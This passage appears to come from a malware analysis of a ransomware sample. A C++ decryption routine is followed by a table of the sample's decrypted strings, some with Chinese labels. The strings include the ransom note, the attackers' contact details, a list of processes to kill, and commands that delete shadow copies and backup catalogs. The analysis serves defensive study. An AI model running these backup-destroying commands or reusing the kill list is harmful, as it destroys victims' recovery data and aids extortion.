221, 61, 217, 236, 29, 122, 31, 220, 237, 195, 255, 229, 237, 248, 140, 130, 62, 111, 235, 193, 224, 34, 127, 66, 65, 13, 222, 140, 79, 253, 54, 170, 195, 88, 133, 19, 204, 201, 114, 113, 46, 194, 194, 2, 234, 22, 246, 142, 50, 114, 206, 189, 55, 117, 85, 220, 167, 
238, 172, 65, 85, 20, 169, 56, 183, 200, 234, 105, 156, 113, 111, 124, 254, 20, 207, 138, 175, 188, 85, 109, 158, 108, 120, 88, 120, 24, 72, 193, 84, 187, 130, 161, 61, 225, 113, 58, 175, 36, 50, 116, 160, 208, 231, 163, 56, 78, 124, 168, 175, 160, 221, 11, 179, 255, 32, 59, 120, 41, 141, 67, 25, 228, 197, 152, 183, 39, 8, 129},
        {121, 163, 126, 166, 70, 82, 158, 135, 231, 117, 72, 245, 55, 234, 142, 143, 2, 40, 48, 40, 57, 172, 175, 172, 7, 184, 225, 69, 64, 150, 31, 212, 180, 187, 222, 34, 208, 15, 134, 112, 103, 193, 234, 224, 177, 45, 244, 246, 184, 245, 154, 130, 36, 19, 108, 215, 66, 194, 8, 2, 60, 163, 217, 101, 94, 225, 91, 143, 100, 7, 136, 77, 166, 176, 226, 152, 61, 218, 59, 18, 209, 27, 234, 13, 211, 193, 98, 192, 204, 195, 70, 129, 102, 215, 134, 70},
        {17, 230, 101, 210, 113, 81, 131, 18, 131, 76, 160, 127, 178, 8, 228, 169, 109, 213, 120, 188, 172, 61, 157, 142, 245, 10, 169, 217, 135, 221, 98, 71, 192, 162, 197, 171, 153, 229, 87, 154, 157, 9, 49, 53, 198, 142, 42, 150, 46, 171, 151, 246, 251, 72, 69, 91, 98, 190, 190, 29, 225, 114, 207, 2, 111, 116, 139, 214, 219, 93, 20, 171, 192, 102, 177, 92, 87, 204, 30, 196, 105, 42, 62, 34, 15, 230, 237, 144, 194, 205, 87, 139, 144, 162, 234, 166, 155, 250, 122, 236, 242, 205, 222, 112, 197, 39, 185, 95, 210, 49, 86, 187, 222, 220, 53, 209, 105, 226, 150, 166, 249, 133, 48, 64, 53, 101, 32, 81, 204, 174, 240, 214, 62, 124, 156, 17, 122, 248, 199, 179, 183, 80, 248, 253, 95, 90, 94, 97, 61, 72, 80, 208, 84, 99, 34, 137, 246, 194, 243, 10},
        {206, 63, 216, 111, 119, 204, 152, 113, 39, 8, 244, 241, 236, 127, 109, 73, 242, 80, 165, 14, 114, 115, 170, 141, 101, 46, 111, 228, 3, 67, 110, 41},
        {186, 39, 85, 26, 162, 180, 200, 41, 194, 73, 68, 78, 46, 31, 32, 244, 0, 197, 44, 198, 0, 218, 178, 215, 195, 128, 3, 13, 60, 231, 249, 151},
        {226, 207, 218, 140, 254, 136, 157, 24, 120, 1, 6, 109, 179, 102, 183, 222, 89, 128, 10, 59, 149, 163, 194, 87, 80, 208, 106, 224, 120, 162, 95, 243},
        {246, 240, 58, 163, 220, 47, 102, 221, 14, 218, 96, 153, 104, 232, 240, 162, 226, 79, 17, 97, 82, 205, 34, 128, 153, 211, 191, 126, 171, 185, 9, 19, 28, 238, 251, 234, 140, 160, 110, 143, 181, 247, 238, 106, 227, 172, 161, 175, 223, 205, 79, 119, 12, 160, 168, 78, 126, 157, 157, 169, 232, 39, 138, 3},
        {128, 249, 56, 168, 34, 114, 54, 29, 101, 211, 151, 85, 155, 216, 172, 130, 25, 17, 159, 232, 55, 112, 206, 191, 74, 109, 135, 181, 250, 83, 198, 251},
        {22, 239, 8, 42, 56, 14, 157, 119, 250, 135, 19, 247, 13, 34, 61, 233, 255, 113, 232, 70, 140, 59, 248, 108, 97, 13, 98, 182, 101, 144, 177, 21},
        {99, 214, 157, 24, 52, 212, 41, 114, 163, 134, 136, 247, 32, 100, 52, 221, 98, 185, 59, 233, 232, 21, 173, 138, 180, 239, 37, 98, 61, 142, 192, 140, 152, 53, 102, 235, 103, 184, 206, 48, 234, 147, 155, 161, 63, 45, 212, 190, 153, 246, 142, 40, 225, 219, 0, 197, 249, 143, 231, 14, 243, 3, 193, 103},
        {100, 9, 42, 43, 130, 195, 221, 105, 61, 54, 142, 207, 63, 202, 227, 116, 129, 99, 53, 103, 33, 75, 253, 75, 73, 217, 24, 126, 198, 228, 226, 229}, 
        {6, 184, 47, 43, 226, 131, 113, 149, 211, 215, 155, 126, 201, 192, 218, 190, 109, 212, 33, 204, 134, 254, 158, 218, 179, 234, 218, 73, 77, 83, 223, 230},
        {174, 147, 21, 204, 35, 237, 105, 225, 217, 125, 155, 197, 82, 27, 87, 9, 142, 51, 71, 45, 79, 115, 96, 219, 205, 162, 253, 115, 79, 24, 41, 183},
        {244, 166, 215, 221, 36, 150, 206, 41, 82, 194, 96, 97, 57, 72, 245, 188, 47, 142, 128, 64, 143, 10, 69, 197, 221, 176, 56, 81, 216, 220, 188, 47},
        {36, 37, 125, 116, 74, 204, 118, 25, 189, 194, 54, 192, 90, 116, 143, 195, 140, 10, 66, 229, 55, 142, 72, 35, 139, 185, 88, 160, 225, 53, 152, 216, 203, 222, 69, 157, 98, 19, 182, 247, 40, 83, 64, 176, 214, 0, 144, 14, 198, 44, 109, 202, 11, 25, 5, 55, 180, 24, 86, 17, 56, 182, 96, 49, 120, 246, 254, 207, 173, 164, 111, 20, 170, 193, 53, 91, 35, 65, 65, 253, 73, 55, 216, 227, 111, 3, 247, 115, 52, 89, 122, 159, 69, 144, 27, 103},
        {28, 226, 151, 180, 52, 101, 230, 26, 183, 120, 151, 249, 251, 91, 21, 180, 178, 183, 238, 91, 183, 106, 2, 96, 161, 169, 73, 187, 246, 40, 116, 101, 189, 208, 73, 250, 171, 146, 149, 82, 183, 47, 136, 10, 86, 252, 214, 10, 111, 18, 66, 130, 55, 233, 48, 92, 76, 67, 217, 28, 232, 102, 198, 106, 214, 211, 78, 41, 49, 238, 95, 164, 20, 218, 84, 40, 167, 137, 19, 242, 100, 191, 215, 15, 4, 108, 12, 134, 89, 241, 90, 248, 77, 223, 112, 245, 214, 81, 42, 61, 232, 20, 98, 121, 91, 143, 240, 206, 96, 11, 10, 251, 87, 137, 247, 128, 45, 7, 38, 244, 232, 155, 6, 48, 89, 232, 54, 125},
        {7, 78, 82, 40, 205, 120, 104, 239, 180, 179, 224, 107, 90, 72, 234, 188, 177, 199, 96, 148, 186, 132, 142, 190, 103, 2, 73, 160, 233, 198, 106, 142},
        {123, 199, 186, 153, 219, 54, 0, 16, 231, 44, 71, 12, 205, 66, 82, 13, 66, 160, 88, 236, 154, 60, 171, 105, 171, 227, 9, 41, 57, 94, 32, 123},
        {91, 92, 65, 75, 10, 153, 168, 126, 207, 108, 122, 152, 185, 100, 107, 73, 85, 126, 249, 2, 102, 216, 32, 48, 173, 163, 221, 126, 46, 169, 175, 191},
        {73, 154, 60, 102, 80, 39, 20, 37, 16, 1, 171, 207, 96, 82, 123, 165, 31, 27, 205, 126, 55, 247, 180, 1, 119, 49, 212, 121, 203, 181, 25, 184}, 
        {106, 148, 67, 49, 8, 181, 99, 70, 221, 173, 244, 91, 148, 57, 27, 208, 124, 180, 8, 150, 27, 183, 87, 60, 10, 20, 120, 241, 213, 25, 252, 88},
        {176, 172, 163, 118, 20, 201, 255, 181, 205, 48, 93, 75, 17, 3, 11, 18, 76, 166, 237, 124, 79, 119, 85, 243, 23, 87, 178, 9, 237, 65, 70, 232, 251, 101, 9, 54, 55, 123, 179, 7, 234, 130, 170, 101, 169, 22, 252, 74, 233, 49, 101, 237, 235, 3, 26, 187, 108, 179, 199, 96, 150, 37, 104, 125},
        {78, 62, 210, 220, 177, 142, 250, 52, 52, 58, 113, 142, 154, 170, 129, 120, 70, 34, 254, 202, 87, 106, 6, 137, 118, 64, 210, 201, 223, 166, 141, 44, 54, 81, 55, 190, 223, 147, 109, 134, 195, 157, 14, 222, 215, 117, 53, 85, 67, 203, 200, 162, 236, 217, 163, 216, 243, 6, 7, 34, 251, 29, 141, 238, 39, 42, 20, 146, 58, 254, 64, 191, 5, 240, 182, 63, 80, 33, 254, 71, 232, 87, 76, 149, 45, 178, 232, 116, 101, 38, 124, 36, 135, 92, 117, 82, 128, 42, 34, 199, 9, 1, 139, 174, 98, 140, 6, 176, 52, 107, 9, 26, 77, 7, 125, 204, 47, 32, 126, 131, 121, 24, 234, 29, 247, 82, 184, 3}, {170, 163, 0, 183, 231, 51, 142, 209, 196, 158, 219, 242, 62, 162, 33, 164, 63, 24, 49, 252, 95, 194, 250, 10, 115, 157, 153, 19, 18, 240, 195, 196, 178, 24, 100, 174, 111, 217, 164, 210, 65, 129, 26, 38, 67, 96, 133, 166, 246, 58, 46, 252, 232, 186, 151, 165, 107, 168, 181, 118, 26, 43, 182, 156, 129, 90, 92, 108, 73, 233, 180, 118, 255, 197, 32, 98, 167, 93, 69, 187, 34, 146, 161, 43, 249, 186, 202, 174, 38, 150, 183, 70, 226, 217, 248, 128, 66, 142, 106, 66, 56, 156, 207, 58, 253, 113, 220, 193, 92, 185, 32, 146, 48, 39, 94, 35, 66, 157, 6, 216, 37, 150, 236, 152, 104, 217, 249, 249},
        {246, 90, 179, 234, 48, 142, 1, 26, 36, 136, 217, 47, 237, 39, 148, 183, 90, 52, 241, 83, 206, 43, 5, 13, 203, 219, 225, 101, 6, 190, 3, 70, 84, 81, 155, 234, 52, 88, 75, 21, 60, 165, 20, 36, 118, 21, 128, 11, 126, 233, 21, 107, 160, 49, 220, 133, 107, 16, 147, 19, 163, 9, 158, 246, 46, 40, 42, 123, 63, 57, 219, 105, 105, 92, 145, 51, 2, 188, 172, 174, 31, 181, 110, 138, 233, 29, 63, 169, 66, 180, 179, 227, 49, 90, 49, 115},
        {172, 40, 133, 17, 93, 47, 207, 47, 88, 33, 169, 159, 208, 62, 66, 62, 138, 133, 43, 164, 180, 21, 35, 65, 138, 194, 105, 63, 72, 27, 215, 62, 187, 171, 29, 51, 48, 168, 242, 106, 199, 183, 238, 170, 45, 180, 253, 252, 200, 62, 150, 176, 114, 101, 182, 251, 190, 225, 197, 194, 102, 124, 222, 229, 165, 1, 90, 252, 242, 189, 16, 147, 114, 225, 110, 170, 27, 76, 242, 52, 201, 124, 37, 0, 132, 200, 62, 116, 26, 164, 143, 155, 23, 73, 214, 204, 33, 242, 15, 0, 220, 65, 0, 11, 96, 186, 104, 76, 229, 33, 215, 236, 190, 198, 62, 242, 187, 204, 202, 86, 32, 23, 206, 210, 107, 27, 174, 164, 116, 28, 92, 74, 132, 63, 235, 127, 236, 192, 119, 239, 162, 43, 6, 227, 79, 229, 162, 227, 200, 226, 91, 25, 41, 201, 4, 132, 144, 47, 47, 13},
        {11, 196, 195, 32, 5, 100, 134, 104, 84, 247, 183, 154, 223, 203, 231, 212, 249, 49, 234, 142, 101, 230, 90, 161, 74, 23, 113, 45, 103, 154, 194, 223},
        {225, 27, 175, 232, 18, 37, 161, 122, 76, 83, 88, 208, 28, 104, 151, 150, 163, 88, 178, 12, 210, 196, 186, 7, 100, 84, 199, 125, 35, 111, 137, 22},
        {99, 192, 5, 231, 196, 191, 149, 122, 168, 127, 92, 174, 236, 236, 214, 170, 99, 242, 62, 64, 27, 193, 183, 109, 195, 35, 151, 195, 241, 61, 229, 139},
        {220, 25, 66, 162, 171, 84, 248, 250, 166, 89, 113, 126, 137, 254, 36, 236, 12, 162, 255, 132, 147, 174, 234, 208, 85, 214, 140, 58, 18, 110, 38, 19},
        {225, 122, 168, 104, 101, 254, 28, 98, 196, 73, 255, 234, 209, 50, 85, 59, 215, 4, 226, 206, 4, 104, 132, 56, 18, 67, 88, 151, 197, 2, 113, 127, 69, 221, 16, 243, 76, 58, 31, 9, 95, 116, 231, 41, 124, 176, 43, 219, 80, 250, 227, 102, 37, 99, 70, 154, 210, 218, 203, 39, 185, 172, 105, 226, 61, 186, 80, 177, 99, 220, 135, 98, 81, 16, 9, 92, 31, 164, 131, 178, 171, 9, 183, 126, 180, 152, 146, 86, 97, 108, 146, 58, 5, 97, 94, 71, 250, 186, 95, 57, 197, 129, 20, 161, 241, 231, 58, 137, 100, 166, 203, 100, 219, 53, 174, 245, 209, 156, 214, 41, 79, 235, 133, 119, 11, 253, 45, 195},
        {63, 1, 129, 0, 184, 38, 2, 45, 48, 182, 29, 246, 225, 57, 153, 32, 252, 56, 102, 191, 106, 27, 20, 53, 211, 92, 58, 203, 65, 57, 143, 240},
        {71, 167, 222, 114, 175, 188, 242, 180, 12, 127, 185, 48, 145, 172, 16, 227, 102, 70, 142, 174, 3, 180, 205, 4, 190, 126, 219, 132, 156, 135, 215, 63, 162, 33, 205, 197, 253, 115, 81, 242, 236, 110, 69, 130, 119, 169, 19, 213, 221, 23, 80, 9, 244, 210, 120, 198, 148, 249, 103, 32, 23, 37, 191, 165, 141, 250, 145, 222, 137, 45, 185, 181, 239, 28, 33, 73, 121, 36, 92, 88, 37, 59, 76, 103, 69, 55, 3, 44, 90, 106, 171, 241, 177, 20, 39, 193},
        {71, 222, 90, 85, 178, 32, 186, 251, 190, 85, 181, 183, 104, 108, 40, 65, 9, 60, 190, 160, 123, 93, 92, 3, 123, 136, 133, 229, 80, 51, 62, 238},
        {236, 8, 245, 211, 134, 204, 47, 173, 97, 61, 239, 77, 34, 14, 198, 120, 44, 109, 241, 215, 133, 77, 145, 142, 6, 168, 90, 21, 254, 249, 26, 218},
        {59, 87, 121, 19, 80, 78, 243, 5, 97, 202, 60, 179, 250, 199, 105, 178, 26, 149, 210, 101, 6, 161, 215, 103, 120, 178, 93, 99, 209, 150, 136, 181, 19, 242, 57, 147, 253, 219, 122, 48, 59, 111, 51, 2, 131, 25, 90, 221, 111, 228, 223, 145, 201, 41, 34, 169, 39, 109, 145, 177, 129, 157, 11, 57, 174, 161, 95, 41, 6, 105, 156, 0, 29, 96, 194, 19, 20, 133, 81, 240, 186, 84, 155, 76, 84, 15, 226, 230, 151, 252, 96, 176, 156, 202, 74, 193, 228, 6, 61, 205, 55, 15, 199, 68, 227, 218, 250, 7, 139, 43, 159, 42, 239, 54, 176, 28, 102, 27, 206, 71, 204, 171, 71, 249, 254, 51, 52, 178, 173, 226, 162, 107, 80, 186, 148, 255, 43, 144, 102, 168, 28, 153, 205, 204, 117, 93, 42, 228, 229, 147, 173, 67, 82, 33, 124, 67, 25, 177, 110, 209, 20, 90, 128, 2, 103, 133, 187, 109, 240, 154, 49, 65, 213, 38, 150, 74, 240, 209, 21, 167, 89, 72, 177, 179, 135, 111, 54, 145, 71, 70, 94, 119},
        {91, 47, 23, 232, 198, 63, 14, 123, 10, 15, 137, 32, 228, 93, 19, 41, 157, 82, 6, 83, 50, 236, 50, 57, 149, 66, 140, 61, 76, 155, 176, 70, 93, 84, 127, 86, 142, 185, 211, 80, 34, 97, 95, 238, 38, 223, 43, 52, 27, 235, 20, 42, 116, 51, 52, 165, 98, 254, 148, 221, 125, 233, 64, 164, 154, 182, 24, 104, 74, 145, 234, 27, 239, 233, 45, 188, 118, 23, 251, 127, 57, 233, 46, 180, 212, 197, 177, 74, 201, 132, 230, 34, 9, 28, 2, 234},
        {82, 95, 95, 51, 123, 134, 16, 124, 201, 95, 89, 140, 151, 210, 135, 22, 9, 120, 72, 172, 144, 146, 118, 135, 251, 84, 81, 164, 2, 201, 90, 66, 219, 55, 201, 185, 209, 227, 138, 167, 128, 215, 59, 170, 115, 144, 227, 74, 207, 142, 89, 180, 233, 20, 11, 202, 12, 33, 100, 0, 182, 189, 235, 0}
    };

    for (size_t i = 0; i < cipher_list.size(); i++)
    {
        // Import a fresh key handle for every buffer: CryptDecrypt is called with
        // Final = FALSE below, so any chaining state left by the previous buffer
        // would otherwise carry over into this one.
        if (!CryptImportKey(hProv, (BYTE*)&keyBlob, sizeof(keyBlob), 0, 0, &hKey)) {
            std::cerr << "CryptImportKey failed: " << GetLastError() << std::endl;
            if (hProv) CryptReleaseContext(hProv, 0);
            return 1;
        }
        DWORD dataLen = (DWORD)cipher_list[i].size();
        if (!CryptDecrypt(hKey, 0, 0, 0, cipher_list[i].data(), &dataLen)) {
            std::cerr << "CryptDecrypt failed: " << GetLastError() << std::endl;
            CryptDestroyKey(hKey);
            CryptReleaseContext(hProv, 0);
            return 1;
        }
        cipher_list[i].resize(dataLen);
        std::cout << "Sign: " << sign_list[i] << std::endl;
        //std::cout << "Plaintext: " << cipher_list[i].data() << std::endl;
        std::cout << "Data ";
        PrintHex(cipher_list[i]);
        std::cout << "------------------------------" << std::endl;
        CryptDestroyKey(hKey);   // release this iteration's key handle before importing the next
    }
    CryptReleaseContext(hProv, 0);
    return 0;
}

  The output of this program is still not very readable, so I ran it through a Python script once more; the result is shown below. From here on, a flag value can simply be looked up in this table to identify the decrypted string quickly.

4.1.4.2 Decrypted strings

Flag: 0x0
Decrypted string: SRC
Decrypted HEX: 5300520043000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x1
Decrypted string: chewbacca@cock.li
Decrypted HEX: 630068006500770062006100630063006100400063006f0063006b002e006c006900000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x4
Decrypted string: boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;+README-WARNING+.txt;desktop.ini;
Decrypted HEX: 62006f006f0074002e0069006e0069003b0062006f006f00740066006f006e0074002e00620069006e003b006e0074006c00640072003b006e0074006400650074006500630074002e0063006f006d003b0069006f002e007300790073003b002b0052004500410044004d0045002d005700410052004e0049004e0047002b002e007400780074003b006400650073006b0074006f0070002e0069006e0069003b00000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x5
Decrypted string: sqlbrowser.exe;sqlwriter.exe;sqlservr.exe;msmdsrv.exe;MsDtsSrvr.exe;sqlceip.exe;fdlauncher.exe;Ssms.exe;sqlagent.exe;fdhost.exe;ReportingServicesService.exe;msftesql.exe;pg_ctl.exe;postgres.exe;UniFi.exe;armsvc.exe;IntelCpHDCPSvc.exe;OfficeClickToRun.exe;DellOSDService.exe;DymoPnpService.exe;Agent.exe;FJTWMKSV.exe;IPROSetMonitor.exe;IRMTService.exe;MBCloudEA.exe;QBCFMonitorService.exe;QBIDPService.exe;RstMwService.exe;TeamViewer_Service.exe;dasHost.exe;IntelCpHeciSvc.exe;RAVBg64.exe;vds.exe;unsecapp.exe;TodoBackupService.exe;MediaButtons.exe;IAStorDataMgrSvc.exe;jhi_service.exe;LMS.exe;DDVDataCollector.exe;DDVCollectorSvcApi.exe;TeamViewer.exe;tv_w32.exe;tv_x64.exe;Microsoft.Photos.exe;MicrosoftEdge.exe;ApplicationFrameHost.exe;browser_broker.exe;MicrosoftEdgeSH.exe;MicrosoftEdgeCP.exe;RtkNGUI64.exe;WavesSvc64.exe;OneDrive.exe;DYMO.DLS.Printing.Host.exe;FtLnSOP.exe;FjtwMkup.exe;FTPWREVT.exe;FTErGuid.exe;qbupdate.exe;QBWebConnector.exe;ShellExperienceHost.exe;RuntimeBroker.exe;IAStorIcon.exe;PrivacyIconClient.exe;SupportAssistAgent.exe;SecurityHealthService.exe;taskhostw.exe;taskhosta.exe;wijca.exe;ktfwswe.exe;HeciServer.exe;mdm.exe;ULCDRSvr.exe;WLIDSVC.EXE;WLIDSVCM.EXE;GoogleCrashHandler.exe;GoogleCrashHandler64.exe;RAVCpl64.exe;igfxtray.exe;hkcmd.exe;igfxpers.exe;PsiService_2.exe;UNS.exe;taskeng.exe;AdobeARM.exe;LenovoReg.exe;dwm.exe;wuauclt.exe;avp.exe;FBService.exe;LBAEvent.exe;PDFProFiltSrvPP.exe;avpsus.exe;klnagent.exe;vapm.exe;ScanToPCActivationApp.exe;BrStMonW.exe;BrCtrlCntr.exe;concentr.exe;redirector.exe;BrccMCtl.exe;BrYNSvc.exe;Receiver.exe;BrCcUxSys.exe;LSCNotify.exe;SelfServicePlugin.exe;wfcrun32.exe;HPNETW~1.EXE;HPScan.exe;taskhost.exe;Teams.exe;AuthManSvr.exe;WLXPhotoGallery.exe;outlook.exe;prevhost.exe;excel.exe;chrome.exe;AcroRd32.exe;RdrCEF.exe;vssadmin.exe;WmiPrvSE.exe;oracle.exe;ocssd.exe;dbsnmp.exe;synctime.exe;agntsrvc.exe;mydesktopqos.exe;isqlplussvc.exe;xfssvccon.exe;mydesktopservice.exe;ocautoupds.exe;encsvc.exe;firefoxconfig.exe;tbirdconfig.exe;ocomm.exe;mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;dbeng50.exe;sqbcoreservice.exe;infopath.exe;msaccess.exe;mspub.exe;onenote.exe;powerpnt.exe;steam.exe;thebat.exe;thebat64.exe;thunderbird.exe;visio.exe;winword.exe;wordpad.exe;
Decrypted HEX: 
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x6
Decrypted string: +README-WARNING+.txt
Decrypted HEX: 2b0052004500410044004d0045002d005700410052004e0049004e0047002b002e00740078007400000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x7
Decrypted string: YOUR_FILES_ARE_ENCRYPTED
Decrypted HEX: 59004f00550052005f00460049004c00450053005f004100520045005f0045004e00430052005900500054004500440000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x8
Decrypted string: ::: Greetings :::

Little FAQ:

.1. 
Q: Whats Happen?
A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen.

.2. 
Q: How to recover files?
A: If you wish to decrypt your files you will need to pay us.

.3. 
Q: What about guarantees?
A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests.
To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.

.4.
Q: How to contact with you?
A: You can write us to our mailbox: chewbacca@cock.li
Or you can contact us via TOX: ADA6E26332F26451E45768179C771CA87A7F0F4E234DA8D882888F505494925DCF274A3EA555
You don't know about TOX? Go to https://tox.chat

.5.
Q: How will the decryption process proceed after payment?
A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files.

.6.
Q: If I don't want to pay bad people like you?
A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money.



:::BEWARE:::
DON'T try to change encrypted files by yourself! 
If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files!
Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

Decrypted HEX: 
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x9
Decrypted string: vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet
wmic shadowcopy delete
exit

Decrypted HEX: 76737361646d696e2064656c65746520736861646f7773202f616c6c202f71756965740a776261646d696e2064656c65746520636174616c6f67202d71756965740a776d696320736861646f77636f70792064656c6574650a657869740a0000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0xa
Decrypted string: (binary: a CryptoAPI PUBLICKEYBLOB holding a 1024-bit RSA public key; see HEX)
Decrypted HEX: 0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0xc
Decrypted string: (binary, 4 bytes; see HEX)
Decrypted HEX: 6edc7a8e00000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0xe
Decrypted string: 
Decrypted HEX: 0000040000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0xf
Decrypted string: 
Decrypted HEX: 0000100000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x10
Decrypted string: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Decrypted HEX: 534f4654574152455c4d6963726f736f66745c57696e646f7773204e545c43757272656e7456657273696f6e0000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x11
Decrypted string: ProductId
Decrypted HEX: 50726f6475637449640000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x12
Decrypted string: \\?\
Decrypted HEX: 5c005c003f005c00000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x13
Decrypted string: waiting for network...
Decrypted HEX: 770061006900740069006e006700200066006f00720020006e006500740077006f0072006b002e002e002e000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x14
Decrypted string: runas
Decrypted HEX: 720075006e006100730000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x16
Decrypted string: SystemDrive
Decrypted HEX: 530079007300740065006d004400720069007600650000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x17
Decrypted string: ComSpec
Decrypted HEX: 43006f006d005300700065006300000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x18
Decrypted string: .[%08X].[%s].%s
Decrypted HEX: 2e005b0025003000380058005d002e005b00250073005d002e00250073000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x19
Decrypted string: X:\ProgramData\microsoft\windows\caches
Decrypted HEX: 58003a005c00500072006f006700720061006d0044006100740061005c006d006900630072006f0073006f00660074005c00770069006e0064006f00770073005c00630061006300680065007300000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x1a
Decrypted string: Kernel32.dll;Wow64DisableWow64FsRedirection;Wow64RevertWow64FsRedirection;Advapi32.dll;CreateProcessWithTokenW;
Decrypted HEX: 4b65726e656c33322e646c6c3b576f77363444697361626c65576f77363446735265646972656374696f6e3b576f773634526576657274576f77363446735265646972656374696f6e3b41647661706933322e646c6c3b43726561746550726f6365737357697468546f6b656e573b0000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x1b
Decrypted string: exe;dll;
Decrypted HEX: 6500780065003b0064006c006c003b0000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x1e
Decrypted string: finished
Decrypted HEX: 66696e6973686564000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x1f
Decrypted string: open
Decrypted HEX: 6f00700065006e00000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag: 0x20
Decrypted string: admin
Decrypted HEX: 610064006d0069006e0000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x21
解密字符串:not admin
解密HEX: 6e006f0074002000610064006d0069006e000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x22
解密字符串:1. ID: %08X
2. %s

解密HEX: 31002e002000490044003a00200025003000380058000d000a0032002e002000250073000d000a00000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x23
解密字符串:%s (%08X)%c %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%

解密HEX: 250073002000280025003000380058002900250063002000250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f00250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f0025007500250025000d000a0000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x24
解密字符串:3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%

解密HEX: 33002e00200054006f00740061006c003a002000250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f00250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f0025007500250025000d000a000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x25
解密字符串:X:\Users\All Users\Microsoft\Windows\Caches
解密HEX: 58003a005c00550073006500720073005c0041006c006c002000550073006500720073005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c0043006100630068006500730000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x26
解密字符串:ntdll.dll;NtQueryObject;NtQuerySystemInformation;RtlGetVersion;Kernel32.dll;GetFinalPathNameByHandleW;QueryFullProcessImageNameW;
解密HEX: 6e74646c6c2e646c6c3b4e7451756572794f626a6563743b4e74517565727953797374656d496e666f726d6174696f6e3b52746c47657456657273696f6e3b4b65726e656c33322e646c6c3b47657446696e616c506174684e616d65427948616e646c65573b517565727946756c6c50726f63657373496d6167654e616d65573b00000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x27
解密字符串:chrome;
解密HEX: 6300680072006f006d0065003b00000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x28
解密字符串:Users\Public;
解密HEX: 550073006500720073005c005000750062006c00690063003b00000000000000
